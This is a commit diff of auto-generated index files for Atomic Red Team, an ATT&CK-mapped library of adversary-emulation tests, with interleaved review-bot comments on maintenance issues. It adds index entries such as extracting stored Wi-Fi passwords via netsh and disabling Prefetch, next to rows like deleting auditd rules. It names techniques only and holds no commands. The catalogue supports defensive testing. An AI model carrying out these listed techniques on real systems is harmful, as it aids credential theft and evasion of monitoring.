Generated docs from job=generate-docs branch=master [ci skip]

Atomic Red Team doc generator
2024-05-15 00:48:54 +00:00
parent 5f71a665e2
commit 9c842daeb3
37 changed files with 568 additions and 59 deletions
+1 -1
@@ -2,7 +2,7 @@
# Atomic Red Team
![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1556-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1561-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
Atomic Red Team™ is a library of tests mapped to the
[MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use
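Review bot: the Atomics count is hard-coded into a static shields.io badge URL (`Atomics-1561-flat.svg`), so it is only correct for as long as the generate-docs job keeps it in sync with the index; in this commit the bump from 1556 to 1561 does match the five rows added to the index CSV (T1553.006 #1, T1112 #71, T1219 #13, T1016.002 #1, T1018 #22), so the only ask is to keep that number derived from the index rather than edited by hand.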
File diff suppressed because one or more lines are too long
+5
@@ -248,6 +248,7 @@ defense-evasion,T1553.003,Subvert Trust Controls: SIP and Trust Provider Hijacki
defense-evasion,T1562.012,Impair Defenses: Disable or Modify Linux Audit System,1,Delete all auditd rules using auditctl,33a29ab1-cabb-407f-9448-269041bf2856,sh
defense-evasion,T1562.012,Impair Defenses: Disable or Modify Linux Audit System,2,Disable auditd using auditctl,7906f0a6-b527-46ee-9026-6e81a9184e08,sh
defense-evasion,T1207,Rogue Domain Controller,1,DCShadow (Active Directory),0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,powershell
defense-evasion,T1553.006,Subvert Trust Controls: Code Signing Policy Modification,1,Code Signing Policy Modification,bb6b51e1-ab92-45b5-aeea-e410d06405f8,command_prompt
defense-evasion,T1610,Deploy a container,1,Deploy Docker container,59aa6f26-7620-417e-9318-589e0fb7a372,bash
defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt
defense-evasion,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt
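Review bot: the new T1553.006 row (`Code Signing Policy Modification,bb6b51e1-...,command_prompt`) carries no platform field; the CSV index leaves consumers to infer Windows from the executor name, whereas the markdown index in this same commit records `[windows]` explicitly. Consider adding a platform column to the CSV so tooling that filters tests by OS does not have to map executor names to platforms.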
@@ -319,6 +320,7 @@ defense-evasion,T1112,Modify Registry,67,Enable Proxy Settings,eb0ba433-63e5-4a8
defense-evasion,T1112,Modify Registry,68,Set-Up Proxy Server,d88a3d3b-d016-4939-a745-03638aafd21b,command_prompt
defense-evasion,T1112,Modify Registry,69,RDP Authentication Level Override,7e7b62e9-5f83-477d-8935-48600f38a3c6,command_prompt
defense-evasion,T1112,Modify Registry,70,Enable RDP via Registry (fDenyTSConnections),16bdbe52-371c-4ccf-b708-79fba61f1db4,command_prompt
defense-evasion,T1112,Modify Registry,71,Disable Windows Prefetch Through Registry,7979dd41-2045-48b2-a54e-b1bc2415c9da,command_prompt
defense-evasion,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,2,Pad Binary to Change Hash using truncate command - Linux/macOS,e22a9e89-69c7-410f-a473-e6c212cd2292,sh
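Review bot: the context line for T1574.008 still reads `powerShell Persistence via hijacking default modules - Get-Variable.exe`, with inconsistent casing in the test name; this is pre-existing and not introduced by the new T1112 #71 row, but since index.csv is generated from the atomic YAML the fix belongs in the T1574.008 definition rather than in this file.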
@@ -1241,6 +1243,7 @@ command-and-control,T1219,Remote Access Software,9,UltraViewer - RAT Execution,1
command-and-control,T1219,Remote Access Software,10,UltraVNC Execution,42e51815-a6cc-4c75-b970-3f0ff54b610e,powershell
command-and-control,T1219,Remote Access Software,11,MSP360 Connect Execution,b1b8128b-c5d4-4de9-bf70-e60419274562,powershell
command-and-control,T1219,Remote Access Software,12,RustDesk Files Detected Test on Windows,f1641ba9-919a-4323-b74f-33372333bf0e,powershell
command-and-control,T1219,Remote Access Software,13,Splashtop Execution,b025c580-029e-4023-888d-a42710d76934,powershell
command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell
command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell
command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell
@@ -1714,6 +1717,7 @@ discovery,T1082,System Information Discovery,30,Check computer location,96be6002
discovery,T1082,System Information Discovery,31,BIOS Information Discovery through Registry,f2f91612-d904-49d7-87c2-6c165d23bead,command_prompt
discovery,T1082,System Information Discovery,32,ESXi - VM Discovery using ESXCLI,2040405c-eea6-4c1c-aef3-c2acc430fac9,command_prompt
discovery,T1082,System Information Discovery,33,ESXi - Darkside system information discovery,f89812e5-67d1-4f49-86fa-cbc6609ea86a,command_prompt
discovery,T1016.002,System Network Configuration Discovery: Wi-Fi Discovery,1,Enumerate Stored Wi-Fi Profiles And Passwords via netsh,53cf1903-0fa7-4177-ab14-f358ae809eec,command_prompt
discovery,T1010,Application Window Discovery,1,List Process Main Windows - C# .NET,fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4,command_prompt
discovery,T1580,Cloud Infrastructure Discovery,1,AWS - EC2 Enumeration from Cloud Instance,99ee161b-dcb1-4276-8ecb-7cfdcb207820,sh
discovery,T1580,Cloud Infrastructure Discovery,2,AWS - EC2 Security Group Enumeration,99b38f24-5acc-4aa3-85e5-b7f97a5d37ac,command_prompt
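Review bot: the new T1016.002 row describes a test named `Enumerate Stored Wi-Fi Profiles And Passwords via netsh`, so its output contains stored credentials, yet nothing in the index marks the output as sensitive. Suggest the technique page (and the test's YAML description) state that the executor output should be treated as sensitive and not left in shared run logs, since runners commonly capture stdout.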
@@ -1824,6 +1828,7 @@ discovery,T1018,Remote System Discovery,18,Enumerate Active Directory Computers
discovery,T1018,Remote System Discovery,19,Get-DomainController with PowerView,b9d2e8ca-5520-4737-8076-4f08913da2c4,powershell
discovery,T1018,Remote System Discovery,20,Get-WmiObject to Enumerate Domain Controllers,e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad,powershell
discovery,T1018,Remote System Discovery,21,Remote System Discovery - net group Domain Controller,5843529a-5056-4bc1-9c13-a311e2af4ca0,command_prompt
discovery,T1018,Remote System Discovery,22,Enumerate Remote Hosts with Netscan,b8147c9a-84db-4ec1-8eee-4e0da75f0de5,powershell
discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
discovery,T1046,Network Service Discovery,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
discovery,T1046,Network Service Discovery,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
@@ -151,6 +151,7 @@ defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,23,
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,24,Set a firewall rule using New-NetFirewallRule,94be7646-25f6-467e-af23-585fb13000c8,powershell
defense-evasion,T1553.003,Subvert Trust Controls: SIP and Trust Provider Hijacking,1,SIP (Subject Interface Package) Hijacking via Custom DLL,e12f5d8d-574a-4e9d-8a84-c0e8b4a8a675,command_prompt
defense-evasion,T1207,Rogue Domain Controller,1,DCShadow (Active Directory),0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,powershell
defense-evasion,T1553.006,Subvert Trust Controls: Code Signing Policy Modification,1,Code Signing Policy Modification,bb6b51e1-ab92-45b5-aeea-e410d06405f8,command_prompt
defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt
defense-evasion,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt
defense-evasion,T1112,Modify Registry,3,Modify registry to store logon credentials,c0413fb5-33e2-40b7-9b6f-60b29f4a7a18,command_prompt
@@ -221,6 +222,7 @@ defense-evasion,T1112,Modify Registry,67,Enable Proxy Settings,eb0ba433-63e5-4a8
defense-evasion,T1112,Modify Registry,68,Set-Up Proxy Server,d88a3d3b-d016-4939-a745-03638aafd21b,command_prompt
defense-evasion,T1112,Modify Registry,69,RDP Authentication Level Override,7e7b62e9-5f83-477d-8935-48600f38a3c6,command_prompt
defense-evasion,T1112,Modify Registry,70,Enable RDP via Registry (fDenyTSConnections),16bdbe52-371c-4ccf-b708-79fba61f1db4,command_prompt
defense-evasion,T1112,Modify Registry,71,Disable Windows Prefetch Through Registry,7979dd41-2045-48b2-a54e-b1bc2415c9da,command_prompt
defense-evasion,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,1,LockBit Black - Modify Group policy settings -cmd,9ab80952-74ee-43da-a98c-1e740a985f28,command_prompt
defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,2,LockBit Black - Modify Group policy settings -Powershell,b51eae65-5441-4789-b8e8-64783c26c1d1,powershell
@@ -829,6 +831,7 @@ command-and-control,T1219,Remote Access Software,9,UltraViewer - RAT Execution,1
command-and-control,T1219,Remote Access Software,10,UltraVNC Execution,42e51815-a6cc-4c75-b970-3f0ff54b610e,powershell
command-and-control,T1219,Remote Access Software,11,MSP360 Connect Execution,b1b8128b-c5d4-4de9-bf70-e60419274562,powershell
command-and-control,T1219,Remote Access Software,12,RustDesk Files Detected Test on Windows,f1641ba9-919a-4323-b74f-33372333bf0e,powershell
command-and-control,T1219,Remote Access Software,13,Splashtop Execution,b025c580-029e-4023-888d-a42710d76934,powershell
command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell
command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell
command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell
@@ -1136,6 +1139,7 @@ discovery,T1082,System Information Discovery,28,Driver Enumeration using DriverQ
discovery,T1082,System Information Discovery,29,System Information Discovery,4060ee98-01ae-4c8e-8aad-af8300519cc7,command_prompt
discovery,T1082,System Information Discovery,30,Check computer location,96be6002-9200-47db-94cb-c3e27de1cb36,command_prompt
discovery,T1082,System Information Discovery,31,BIOS Information Discovery through Registry,f2f91612-d904-49d7-87c2-6c165d23bead,command_prompt
discovery,T1016.002,System Network Configuration Discovery: Wi-Fi Discovery,1,Enumerate Stored Wi-Fi Profiles And Passwords via netsh,53cf1903-0fa7-4177-ab14-f358ae809eec,command_prompt
discovery,T1010,Application Window Discovery,1,List Process Main Windows - C# .NET,fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4,command_prompt
discovery,T1217,Browser Bookmark Discovery,5,List Google Chrome / Opera Bookmarks on Windows with powershell,faab755e-4299-48ec-8202-fc7885eb6545,powershell
discovery,T1217,Browser Bookmark Discovery,6,List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt,76f71e2f-480e-4bed-b61e-398fe17499d5,command_prompt
@@ -1208,6 +1212,7 @@ discovery,T1018,Remote System Discovery,18,Enumerate Active Directory Computers
discovery,T1018,Remote System Discovery,19,Get-DomainController with PowerView,b9d2e8ca-5520-4737-8076-4f08913da2c4,powershell
discovery,T1018,Remote System Discovery,20,Get-WmiObject to Enumerate Domain Controllers,e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad,powershell
discovery,T1018,Remote System Discovery,21,Remote System Discovery - net group Domain Controller,5843529a-5056-4bc1-9c13-a311e2af4ca0,command_prompt
discovery,T1018,Remote System Discovery,22,Enumerate Remote Hosts with Netscan,b8147c9a-84db-4ec1-8eee-4e0da75f0de5,powershell
discovery,T1046,Network Service Discovery,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
discovery,T1046,Network Service Discovery,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell
discovery,T1046,Network Service Discovery,5,WinPwn - spoolvulnscan,54574908-f1de-4356-9021-8053dd57439a,powershell
+7 -2
@@ -318,7 +318,8 @@
- Atomic Test #2: Disable auditd using auditctl [linux]
- [T1207 Rogue Domain Controller](../../T1207/T1207.md)
- Atomic Test #1: DCShadow (Active Directory) [windows]
- T1553.006 Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1553.006 Subvert Trust Controls: Code Signing Policy Modification](../../T1553.006/T1553.006.md)
- Atomic Test #1: Code Signing Policy Modification [windows]
- [T1610 Deploy a container](../../T1610/T1610.md)
- Atomic Test #1: Deploy Docker container [containers]
- [T1112 Modify Registry](../../T1112/T1112.md)
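Review bot: this hunk folds two changes into one line replacement: the T1553.006 entry is renamed from the short `Code Signing Policy Modification` to the full `Subvert Trust Controls: Code Signing Policy Modification`, and the placeholder is replaced by a link plus `Atomic Test #1`. The rename is presumably the generator switching to full ATT&CK technique names (the linux and macOS indexes in this commit apply the same rename to entries that still say CONTRIBUTE A TEST, e.g. T1016.002), but because it lands in the same diff line as the new test it is easy to miss; a separate generator commit for the naming change would make both easier to review.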
@@ -392,6 +393,7 @@
- Atomic Test #68: Set-Up Proxy Server [windows]
- Atomic Test #69: RDP Authentication Level Override [windows]
- Atomic Test #70: Enable RDP via Registry (fDenyTSConnections) [windows]
- Atomic Test #71: Disable Windows Prefetch Through Registry [windows]
- [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
- Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
- T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1718,6 +1720,7 @@
- Atomic Test #10: UltraVNC Execution [windows]
- Atomic Test #11: MSP360 Connect Execution [windows]
- Atomic Test #12: RustDesk Files Detected Test on Windows [windows]
- Atomic Test #13: Splashtop Execution [windows]
- T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1572 Protocol Tunneling](../../T1572/T1572.md)
@@ -2373,7 +2376,8 @@
- Atomic Test #31: BIOS Information Discovery through Registry [windows]
- Atomic Test #32: ESXi - VM Discovery using ESXCLI [linux]
- Atomic Test #33: ESXi - Darkside system information discovery [linux]
- T1016.002 Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1016.002 System Network Configuration Discovery: Wi-Fi Discovery](../../T1016.002/T1016.002.md)
- Atomic Test #1: Enumerate Stored Wi-Fi Profiles And Passwords via netsh [windows]
- [T1010 Application Window Discovery](../../T1010/T1010.md)
- Atomic Test #1: List Process Main Windows - C# .NET [windows]
- T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -2508,6 +2512,7 @@
- Atomic Test #19: Get-DomainController with PowerView [windows]
- Atomic Test #20: Get-WmiObject to Enumerate Domain Controllers [windows]
- Atomic Test #21: Remote System Discovery - net group Domain Controller [windows]
- Atomic Test #22: Enumerate Remote Hosts with Netscan [windows]
- [T1046 Network Service Discovery](../../T1046/T1046.md)
- Atomic Test #1: Port Scan [linux, macos]
- Atomic Test #2: Port Scan Nmap [linux, macos]
@@ -656,7 +656,7 @@
- Atomic Test #26: FreeBSD List Kernel Modules [linux]
- Atomic Test #32: ESXi - VM Discovery using ESXCLI [linux]
- Atomic Test #33: ESXi - Darkside system information discovery [linux]
- T1016.002 Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1016.002 System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1010 Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1217 Browser Bookmark Discovery](../../T1217/T1217.md)
@@ -82,7 +82,7 @@
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.004 Impair Defenses: Disable or Modify System Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1218.015 Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1553.006 Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1553.006 Subvert Trust Controls: Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.001 Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md)
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [linux, macos]
- Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [linux, macos]
@@ -526,7 +526,7 @@
- Atomic Test #8: Hostname Discovery [linux, macos]
- Atomic Test #12: Environment variables discovery on freebsd, macos and linux [linux, macos]
- Atomic Test #13: Show System Integrity Protection status (MacOS) [macos]
- T1016.002 Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1016.002 System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1010 Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1217 Browser Bookmark Discovery](../../T1217/T1217.md)
@@ -208,7 +208,8 @@
- T1218.015 Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1207 Rogue Domain Controller](../../T1207/T1207.md)
- Atomic Test #1: DCShadow (Active Directory) [windows]
- T1553.006 Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1553.006 Subvert Trust Controls: Code Signing Policy Modification](../../T1553.006/T1553.006.md)
- Atomic Test #1: Code Signing Policy Modification [windows]
- [T1112 Modify Registry](../../T1112/T1112.md)
- Atomic Test #1: Modify Registry of Current User Profile - cmd [windows]
- Atomic Test #2: Modify Registry of Local Machine - cmd [windows]
@@ -280,6 +281,7 @@
- Atomic Test #68: Set-Up Proxy Server [windows]
- Atomic Test #69: RDP Authentication Level Override [windows]
- Atomic Test #70: Enable RDP via Registry (fDenyTSConnections) [windows]
- Atomic Test #71: Disable Windows Prefetch Through Registry [windows]
- [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
- Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
- T1027.001 Obfuscated Files or Information: Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1182,6 +1184,7 @@
- Atomic Test #10: UltraVNC Execution [windows]
- Atomic Test #11: MSP360 Connect Execution [windows]
- Atomic Test #12: RustDesk Files Detected Test on Windows [windows]
- Atomic Test #13: Splashtop Execution [windows]
- T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1572 Protocol Tunneling](../../T1572/T1572.md)
@@ -1644,7 +1647,8 @@
- Atomic Test #29: System Information Discovery [windows]
- Atomic Test #30: Check computer location [windows]
- Atomic Test #31: BIOS Information Discovery through Registry [windows]
- T1016.002 Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1016.002 System Network Configuration Discovery: Wi-Fi Discovery](../../T1016.002/T1016.002.md)
- Atomic Test #1: Enumerate Stored Wi-Fi Profiles And Passwords via netsh [windows]
- [T1010 Application Window Discovery](../../T1010/T1010.md)
- Atomic Test #1: List Process Main Windows - C# .NET [windows]
- T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1737,6 +1741,7 @@
- Atomic Test #19: Get-DomainController with PowerView [windows]
- Atomic Test #20: Get-WmiObject to Enumerate Domain Controllers [windows]
- Atomic Test #21: Remote System Discovery - net group Domain Controller [windows]
- Atomic Test #22: Enumerate Remote Hosts with Netscan [windows]
- [T1046 Network Service Discovery](../../T1046/T1046.md)
- Atomic Test #3: Port Scan NMap for Windows [windows]
- Atomic Test #4: Port Scan using python [windows]
+1 -1
@@ -14,7 +14,7 @@
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) | | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) | | [Data from Local System](../../T1005/T1005.md) | Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md) | Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md) | Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
